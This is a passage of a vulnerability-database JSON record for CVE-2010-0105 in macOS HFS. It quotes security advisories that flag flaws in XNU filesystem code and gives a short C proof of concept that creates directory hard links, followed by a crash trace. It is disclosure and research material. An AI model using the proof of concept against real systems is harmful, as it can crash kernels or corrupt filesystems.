Value to NULL Pointer Dereference in hfs_vfsops.c\n\nCode:\nhttp://opensource.apple.com/source/xnu/xnu-2422.1.72/bsd/hfs/hfs_vfsops.c\n\n--- hfs_vfsops.c ----------------------------\n/*\n * HFS filesystem related variables. \n */\nint\nhfs_sysctl(int *name, __unused u_int namelen, user_addr_t oldp, size_t\n*oldlenp,\nuser_addr_t newp, size_t newlen, vfs_context_t context)\n{\n... \n if ((newlen \u003c= 0) || (newlen \u003e MAXPATHLEN))\n return (EINVAL);\n\n bufsize = MAX(newlen * 3, MAXPATHLEN);\n MALLOC(filename, char *, newlen, M_TEMP, M_WAITOK);\n if (filename == NULL) { \u003c=====================================\nfilename CHECK\n error = ENOMEM;\n goto encodinghint_exit;\n }\n MALLOC(unicode_name, u_int16_t *, bufsize, M_TEMP, M_WAITOK);\n if (filename == NULL) { \u003c======================================\ndouble CHECK?\n error = ENOMEM;\n goto encodinghint_exit;\n }\n\n error = copyin(newp, (caddr_t)filename, newlen);\n if (error == 0) {\n error = utf8_decodestr((u_int8_t *)filename, newlen - 1,\nunicode_name,\n \u0026bytes, bufsize, 0, UTF_DECOMPOSED);\n if (error == 0) {\n hint = hfs_pickencoding(unicode_name, bytes / 2);\n error = sysctl_int(oldp, oldlenp, USER_ADDR_NULL, 0,\n(int32_t *)\u0026hint);\n }\n }\n--- hfs_vfsops.c----------------------------\n\nTwice checking of \u0027filename\u0027 has no sense. Probably \u0027unicode_name\u0027 should\nbe checked in second condition. \n\n\n-2.---------------------------------------------------------\nPossible Buffer Overflow in resource fork (hfs_vnops.c)\n\nUnverified value returned by snprintf() may be bigger as a declared buffer\n(MAXPATHLEN). \n\n\nhttps://developer.apple.com/library/mac/documentation/Darwin/Reference/ManPages/man3/snprintf.3.html\n---\nThe snprintf() and vsnprintf() functions will write at most n-1 of the\ncharacters printed into the out-put output\n put string (the n\u0027th character then gets the terminating `\\0\u0027); if the\nreturn value is greater than or\n equal to the n argument, the string was too short and some of the\nprinted characters were discarded. \n The output is always null-terminated. \n---\n\n\nCode:\nhttp://opensource.apple.com/source/xnu/xnu-2422.1.72/bsd/hfs/hfs_vnops.c\n\n--- hfs_vnops.c ----------------------------\n... \n/*\n * hfs_vgetrsrc acquires a resource fork vnode corresponding to the cnode\nthat is\n * found in \u0027vp\u0027. The rsrc fork vnode is returned with the cnode locked\nand iocount\n * on the rsrc vnode. \n *\n ... \n */\n\nint\nhfs_vgetrsrc(struct hfsmount *hfsmp, struct vnode *vp, struct vnode **rvpp,\nint can_drop_lock, int error_on_unlinked)\n{\n\n... \n\n/*\n * Supply hfs_getnewvnode with a component name. \n */\ncn.cn_pnbuf = NULL;\nif (descptr-\u003ecd_nameptr) {\n MALLOC_ZONE(cn.cn_pnbuf, caddr_t, MAXPATHLEN, M_NAMEI,\nM_WAITOK);\n cn.cn_nameiop = LOOKUP;\n cn.cn_flags = ISLASTCN | HASBUF;\n cn.cn_context = NULL;\n cn.cn_pnlen = MAXPATHLEN;\n cn.cn_nameptr = cn.cn_pnbuf;\n cn.cn_hash = 0;\n cn.cn_consume = 0;\n cn.cn_namelen = snprintf(cn.cn_nameptr, MAXPATHLEN,\n\u003c================\n \"%s%s\", descptr-\u003ecd_nameptr,\n _PATH_RSRCFORKSPEC);\n }\n dvp = vnode_getparent(vp);\n error = hfs_getnewvnode(hfsmp, dvp, cn.cn_pnbuf ? \u0026cn : NULL,\n\u003c================\n descptr, GNV_WANTRSRC | GNV_SKIPLOCK,\n\u0026cp-\u003ec_attr,\n \u0026rsrcfork, \u0026rvp, \u0026newvnode_flags);\n\n--- hfs_vnops.c ----------------------------\n\nPattern is \u0027%s%s\u0027 where sum of length descptr-\u003ecd_nameptr and\n_PATH_RSRCFORKSPEC may be bigger as a declared buffer size (MAXPATHLEN). \nSize of descptr-\u003ecd_nameptr is MAXPATHLEN and value _PATH_RSRCFORKSPEC is\n\n #define _PATH_RSRCFORKSPEC \"/..namedfork/rsrc\"\n\nwhere length is 17 chars. Possible up to 17 chars overflow here?. \n\nNow let\u0027s see hfs_getnewvnode function\n\nhttp://opensource.apple.com/source/xnu/xnu-2422.1.72/bsd/hfs/hfs_cnode.c\n\n--- hfs_cnode.c ----------------------------\nhfs_getnewvnode(\n struct hfsmount *hfsmp,\n struct vnode *dvp,\n struct componentname *cnp, \u003c======== WATCH THIS\n struct cat_desc *descp,\n int flags,\n struct cat_attr *attrp,\n struct cat_fork *forkp,\n struct vnode **vpp,\n int *out_flags)\n{\n... \n if ((*vpp != NULL) \u0026\u0026 (cnp)) {\n /* we could be requesting the rsrc of a hardlink\nfile... */\n vnode_update_identity (*vpp, dvp, cnp-\u003ecn_nameptr,\ncnp-\u003ecn_namelen, cnp-\u003ecn_hash, \u003c== NAMELEN HERE\n (VNODE_UPDATE_PARENT | VNODE_UPDATE_NAME));\n... \n--- hfs_cnode.c ----------------------------\n\nand call to vnode_update_indentity()\n\nhttp://opensource.apple.com/source/xnu/xnu-2422.1.72/bsd/vfs/vfs_cache.c\n\n\n--- vfs_cache.c ----------------------------\nvoid\nvnode_update_identity(vnode_t vp, vnode_t dvp, const char *name, int\nname_len, uint32_t name_hashval, int flags)\n{\n... \n if ( (flags \u0026 VNODE_UPDATE_NAME) ) {\n if (name != vp-\u003ev_name) {\n if (name \u0026\u0026 *name) {\n if (name_len == 0)\n name_len = strlen(name);\n tname = vfs_addname(name, name_len, name_hashval, 0); \u003c==\nNAMELEN HERE\n }\n } else\n flags \u0026= ~VNODE_UPDATE_NAME;\n }\n... \nconst char *\nvfs_addname(const char *name, uint32_t len, u_int hashval, u_int flags)\n{\n return (add_name_internal(name, len, hashval, FALSE, flags)); \u003c== CALL\n\n}\n--- vfs_cache.c ----------------------------\n\nAnd invalid memory reference in add_name_internal()\n\n--- vfs_cache.c ----------------------------\nstatic const char *\nadd_name_internal(const char *name, uint32_t len, u_int hashval, boolean_t\nneed_extra_ref, __unused u_int flags)\n{\n struct stringhead *head;\n string_t *entry;\n uint32_t chain_len = 0;\n uint32_t hash_index;\n uint32_t lock_index;\n char *ptr;\n\n /*\n * if the length already accounts for the null-byte, then\n * subtract one so later on we don\u0027t index past the end\n * of the string. \n */\n if (len \u003e 0 \u0026\u0026 name[len-1] == \u0027\\0\u0027) { \u003c===== INVALID MEMORY REFERENCE\n len--;\n }\n if (hashval == 0) {\n hashval = hash_string(name, len);\n }\n--- vfs_cache.c ----------------------------\n\n\n-3.---------------------------------------------------------\nUnchecked Return Value to NULL Pointer Dereference hfs_catalog.c and not\nonly\n\nPlease pay attention that a buffer length check (stored in some variable)\nshould be performed; also return from *alloc() function family should be\nverified for possible NULL pointers. \nHere are a few FALSE / POSITIVE examples. \n\nhttp://opensource.apple.com/source/xnu/xnu-2422.1.72/bsd/hfs/hfs_catalog.c\n\n--- hfs_catalog.c ----------------------------\n /*\n * builddesc - build a cnode descriptor from an HFS+ key\n */\nstatic int\nbuilddesc(const HFSPlusCatalogKey *key, cnid_t cnid, u_int32_t hint,\nu_int32_t encoding,\n int isdir, struct cat_desc *descp)\n{\n int result = 0;\n unsigned char * nameptr;\n size_t bufsize;\n size_t utf8len;\n unsigned char tmpbuff[128];\n\n /* guess a size... */\n bufsize = (3 * key-\u003enodeName.length) + 1;\n if (bufsize \u003e= sizeof(tmpbuff) - 1) { \u003c============================\n MALLOC(nameptr, unsigned char *, bufsize, M_TEMP, M_WAITOK); \u003c=\nMALLOC FAIL\n } else {\n nameptr = \u0026tmpbuff[0];\n }\n\n result = utf8_encodestr(key-\u003enodeName.unicode,\n key-\u003enodeName.length * sizeof(UniChar),\n nameptr, (size_t *)\u0026utf8len, \u003c============================\n\n... \n maxlinks = MIN(entrycnt, (u_int32_t)(uio_resid(uio) /\nSMALL_DIRENTRY_SIZE));\nbufsize = MAXPATHLEN + (maxlinks * sizeof(linkinfo_t)) + sizeof(*iterator);\nif (extended) {\nbufsize += 2*sizeof(struct direntry);\n}\nMALLOC(buffer, void *, bufsize, M_TEMP, M_WAITOK);\n\u003c============================\nbzero(buffer, bufsize);\n... \nFREE(nameptr, M_TEMP);\nMALLOC(nameptr, unsigned char *, bufsize, M_TEMP, M_WAITOK); \u003c==============\n\nresult = utf8_encodestr(key-\u003enodeName.unicode,\n key-\u003enodeName.length * sizeof(UniChar),\n nameptr, (size_t *)\u0026utf8len,\n bufsize, \u0027:\u0027, 0);\n}\n ... \ncnp = (const CatalogName *)\u0026ckp-\u003ehfsPlus.nodeName;\nbufsize = 1 + utf8_encodelen(cnp-\u003eustr.unicode,\n cnp-\u003eustr.length * sizeof(UniChar),\n \u0027:\u0027, 0);\nMALLOC(new_nameptr, u_int8_t *, bufsize, M_TEMP, M_WAITOK); \u003c========\nresult = utf8_encodestr(cnp-\u003eustr.unicode,\n cnp-\u003eustr.length * sizeof(UniChar),\n new_nameptr, \u0026tmp_namelen, bufsize, \u0027:\u0027, 0);\n\n--- hfs_catalog.c ----------------------------\n\nThe above examples does not look nice, too. Are you among them is the crux\nof the problem applications and kernel crash?\nI informed Apple of those possible errors, it has passed more than a month\nand I still have not received any comment nor solution. \n\n\n--- 1. References ---\nhttp://cxsecurity.com/issue/WLB-2014040027\nhttp://cxsecurity.com/cveshow/CVE-2013-6799/\nhttp://cxsecurity.com/cveshow/CVE-2010-0105/\n\n\n--- 2. Greetz ---\nKacper George and Michal\n\n\n--- 3. Credit ---\nMaksymilian Arciemowicz\nhttp://cxsecurity.com/\nhttp://cifrex.org/\nhttp://cert.cx/\n\nBest regards,\nCXSEC TEAM\nhttp://cxsec.org/\n\n\n. Apple MacOSX 10.9 Hard Link Memory Corruption \n\nDate: 08.11.2013\nhttp://cxsecurity.com/\nhttp://cvemap.org/\n\nURL: http://cxsecurity.com/issue/WLB-2013110059\n\n- 0. Description ---\n\nIn most UNIX-like systems a hard link to a directory is only reserved for the \u0027root\u0027 user when possible at all. \nIn MacOSX 10.6 there was one such a vulnerability (CVE-2010-0105) causing the filesystem being resulting corrupted; the creation of many hard links was the cause. \nA notable exception to this is Mac OS X v10.5 (Leopard) and newer, \nwhich use hard links on directories for the Time Machine backup mechanism only.\u0027\n\n\u0027Only for the Time Machine\u0027 is not True. Let\u0027s see quick PoC\n\nA plain program performing a system call (link)\n----------------------------------------------\nmac-cxs-XK:pochd XK$ cat test.c\n#include \u003cstdio.h\u003e\n#include \u003cunistd.h\u003e\n\nvoid usage(const char* program)\n{\n const char* message = \" [src_dir] [target_dir]\";\n\tfprintf(stderr, \"%s%s\\n\", program, message);\n}\n\nint main(int argc, char* argv[]) {\n if (argc!=3) {\n usage(argv[0]);\n\t return 1;\n }\n \n int ret = link(argv[1],argv[2]);\n \n fprintf(stderr,\"link(3) return= %d\\n\", ret);\n\n return ret;\n}\n\nmac-cxs-XK:pochd XK$ gcc -o test test.c\nmac-cxs-XK:pochd XK$ ls\ntest\ttest.c\nmac-cxs-XK:pochd XK$ mkdir DIR1\nmac-cxs-XK:pochd XK$ ./test DIR1 Hardlink1\nlink(3) return= -1\nmac-cxs-XK:pochd XK$ mkdir DIR1/DIR2\nmac-cxs-XK:pochd XK$ ./test DIR1/DIR2 Hardlink2\nlink(3) return= 0\nmac-cxs-XK:pochd XK$ cd DIR1\nmac-cxs-XK:DIR1 XK$ mkdir DIR2/DIR3\nmac-cxs-XK:DIR1 XK$ ../test DIR2/DIR3 Hardlink3\nlink(3) return= 0\nmac-cxs-XK:DIR1 XK$ cd DIR2\nmac-cxs-XK:DIR2 XK$ mkdir DIR3/DIR4\nmac-cxs-XK:DIR2 XK$ ../../test DIR3/DIR4 Hardlink4\nlink(3) return= -1\n----------------------------------------------\n\n\nHardlink1 and Hardlink4 failed instead Hardlink2 and Hardlink3 did not; so which may be the cause?\nIn my opinion we should recognize it as a security flaw and if Apple is not going to fix this vulnerability then someone should change the Wikipedias at least. \n\nOperation (functionality) of hard links differs from those described in \"Unix Internals: The New Frontiers\" book (by Uresh Vahalia)\nOld unix standards simply prevent to create any hard link to whatever directory for any user (root included). \n\nIs that new CWE-DesignError vulnerability or new UNIX style?\n\nThere may be many possible bad consequences coming out from wrong \u0027hard link\u0027 handling. We will not yet public full description of this problem but we do know that it exists and that it may exhaust kernel/system resources,\nit may cause application crashes or kernel panics. Let\u0027s wait for new MacOSX version. \nA/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A:\ntotal 0\nProcess 14413 stopped\n* thread #1: tid = 0x90ba, 0x00007fff948f7812 libsystem_c.dylib`strlen + 18, queue = \u0027com.apple.main-thread, stop reason = EXC_BAD_ACCESS (code=1, address=0xffb21290)\n frame #0: 0x00007fff948f7812 libsystem_c.dylib`strlen + 18\nlibsystem_c.dylib`strlen + 18:\n-\u003e 0x7fff948f7812: pcmpeqb (%rdi), %xmm0\n 0x7fff948f7816: pmovmskb %xmm0, %esi\n 0x7fff948f781a: andq $15, %rcx\n 0x7fff948f781e: orq $-1, %rax\n(lldb) \n(lldb) bt\n* thread #1: tid = 0x90ba, 0x00007fff948f7812 libsystem_c.dylib`strlen + 18, queue = \u0027com.apple.main-thread, stop reason = EXC_BAD_ACCESS (code=1, address=0xffb21290)\n frame #0: 0x00007fff948f7812 libsystem_c.dylib`strlen + 18\n.. \n\n\nDoes the kernel panic correspond to \u0027ls\u0027 ? More details soon. Credit ---\nMaksymilian Arciemowicz ( http://cert.cx/ )\n\nFrist CVE\u0026CWE compatible bugtraq\nhttp://cxsecurity.com/\nhttp://cvemap.org/\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2010-0105"
},
{
"db": "JVNDB",
"id": "JVNDB-2010-002403"
},
{
"db": "BID",
"id": "39658"
},
{
"db": "VULHUB",
"id": "VHN-42710"
},
{
"db": "PACKETSTORM",
"id": "126039"
},
{
"db": "PACKETSTORM",
"id": "123948"
}
],
"trust": 2.16
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-42710",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-42710"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2010-0105",
"trust": 3.0
},
{
"db": "BID",
"id": "39658",
"trust": 2.8
},
{
"db": "SECTRACK",
"id": "1024723",
"trust": 1.1
},
{
"db": "JVNDB",
"id": "JVNDB-2010-002403",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201004-447",
"trust": 0.7
},
{
"db": "NSFOCUS",
"id": "14886",
"trust": 0.6
},
{
"db": "SREASONRES",
"id": "20100423 MACOS X 10.6.3 FILESYSTEM HFS DENIAL OF SERVICE VULNERABILITY",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "126039",
"trust": 0.2
},
{
"db": "CXSECURITY",
"id": "WLB-2013110059",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "134091",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "88859",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "134090",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "134710",
"trust": 0.1
},
{
"db": "EXPLOIT-DB",
"id": "12375",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-42710",
"trust": 0.1
},
{
"db": "CXSECURITY",
"id": "WLB-2014040027",
"trust": 0.1
},
{
"db": "CXSECURITY",
"id": "WLB-2005090063",
"trust": 0.1
},
{
"db": "CXSECURITY",
"id": "WLB-2010040284",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "123948",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-42710"
},
{
"db": "BID",
"id": "39658"
},
{
"db": "JVNDB",
"id": "JVNDB-2010-002403"
},
{
"db": "PACKETSTORM",
"id": "126039"
},
{
"db": "PACKETSTORM",
"id": "123948"
},
{
"db": "CNNVD",
"id": "CNNVD-201004-447"
},
{
"db": "NVD",
"id": "CVE-2010-0105"
}
]
},
"id": "VAR-201004-0093",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-42710"
}
],
"trust": 0.01
},
"last_update_date": "2024-11-23T19:55:28.460000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "HT4435",
"trust": 0.8,
"url": "http://support.apple.com/kb/HT4435"
},
{
"title": "HT4435",
"trust": 0.8,
"url": "http://support.apple.com/kb/HT4435?viewlocale=ja_JP"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2010-002403"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-Other",
"trust": 1.0
},
{
"problemtype": "CWE-DesignError",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2010-002403"
},
{
"db": "NVD",
"id": "CVE-2010-0105"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "http://www.securityfocus.com/bid/39658"
},
{
"trust": 2.0,
"url": "http://securityreason.com/achievement_securityalert/83"
},
{
"trust": 1.2,
"url": "http://support.apple.com/kb/ht4435"
},
{
"trust": 1.1,
"url": "http://lists.apple.com/archives/security-announce/2010//nov/msg00000.html"
},
{
"trust": 1.1,
"url": "http://www.securitytracker.com/id?1024723"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0105"
},
{
"trust": 0.8,
"url": "http://jvn.jp/cert/jvnvu331391"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2010-0105"
},
{
"trust": 0.6,
"url": "http://www.nsfocus.net/vulndb/14886"
},
{
"trust": 0.3,
"url": "http://www.apple.com/macosx/"
},
{
"trust": 0.2,
"url": "http://cxsecurity.com/issue/wlb-2013110059"
},
{
"trust": 0.2,
"url": "http://cxsecurity.com/"
},
{
"trust": 0.2,
"url": "http://cert.cx/"
},
{
"trust": 0.2,
"url": "http://cxsecurity.com/cveshow/cve-2010-0105/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2010-0105"
},
{
"trust": 0.1,
"url": "http://opensource.apple.com/source/xnu/xnu-2422.1.72/bsd/hfs/hfs_cnode.c"
},
{
"trust": 0.1,
"url": "http://cifrex.org/"
},
{
"trust": 0.1,
"url": "http://opensource.apple.com/source/xnu/xnu-2422.1.72/bsd/vfs/vfs_cache.c"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-6799"
},
{
"trust": 0.1,
"url": "http://cert.cx/stuff/l2.c"
},
{
"trust": 0.1,
"url": "http://cxsec.org/"
},
{
"trust": 0.1,
"url": "http://opensource.apple.com/source/xnu/xnu-2422.1.72/bsd/hfs/hfs_catalog.c"
},
{
"trust": 0.1,
"url": "http://opensource.apple.com/source/xnu/xnu-2422.1.72/bsd/hfs/hfs_vnops.c"
},
{
"trust": 0.1,
"url": "http://opensource.apple.com/source/xnu/xnu-2422.1.72/bsd/hfs/hfs_vfsops.c"
},
{
"trust": 0.1,
"url": "http://cxsecurity.com/cveshow/cve-2013-6799/"
},
{
"trust": 0.1,
"url": "http://cxsecurity.com/issue/wlb-2014040027"
},
{
"trust": 0.1,
"url": "https://developer.apple.com/library/mac/documentation/darwin/reference/manpages/man3/snprintf.3.html"
},
{
"trust": 0.1,
"url": "http://cvemap.org/"
},
{
"trust": 0.1,
"url": "http://cxsecurity.com/issue/wlb-2010040284"
},
{
"trust": 0.1,
"url": "http://cxsecurity.com/issue/wlb-2005090063"
},
{
"trust": 0.1,
"url": "http://en.wikipedia.org/wiki/hard_link"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-42710"
},
{
"db": "BID",
"id": "39658"
},
{
"db": "JVNDB",
"id": "JVNDB-2010-002403"
},
{
"db": "PACKETSTORM",
"id": "126039"
},
{
"db": "PACKETSTORM",
"id": "123948"
},
{
"db": "CNNVD",
"id": "CNNVD-201004-447"
},
{
"db": "NVD",
"id": "CVE-2010-0105"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-42710"
},
{
"db": "BID",
"id": "39658"
},
{
"db": "JVNDB",
"id": "JVNDB-2010-002403"
},
{
"db": "PACKETSTORM",
"id": "126039"
},
{
"db": "PACKETSTORM",
"id": "123948"
},
{
"db": "CNNVD",
"id": "CNNVD-201004-447"
},
{
"db": "NVD",
"id": "CVE-2010-0105"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2010-04-27T00:00:00",
"db": "VULHUB",
"id": "VHN-42710"
},
{
"date": "2010-04-23T00:00:00",
"db": "BID",
"id": "39658"
},
{
"date": "2010-11-25T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2010-002403"
},
{
"date": "2014-04-06T16:22:11",
"db": "PACKETSTORM",
"id": "126039"
},
{
"date": "2013-11-08T21:29:02",
"db": "PACKETSTORM",
"id": "123948"
},
{
"date": "2010-04-27T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201004-447"
},
{
"date": "2010-04-27T15:30:01.217000",
"db": "NVD",
"id": "CVE-2010-0105"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2010-12-10T00:00:00",
"db": "VULHUB",
"id": "VHN-42710"
},
{
"date": "2010-11-10T22:37:00",
"db": "BID",
"id": "39658"
},
{
"date": "2010-11-25T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2010-002403"
},
{
"date": "2010-04-27T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201004-447"
},
{
"date": "2024-11-21T01:11:32.463000",
"db": "NVD",
"id": "CVE-2010-0105"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "local",
"sources": [
{
"db": "BID",
"id": "39658"
},
{
"db": "CNNVD",
"id": "CNNVD-201004-447"
}
],
"trust": 0.9
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Apple Mac OS X of hfs Service disruption in implementation (DoS) Vulnerabilities",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2010-002403"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Design Error",
"sources": [
{
"db": "BID",
"id": "39658"
},
{
"db": "CNNVD",
"id": "CNNVD-201004-447"
}
],
"trust": 0.9
}
}
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.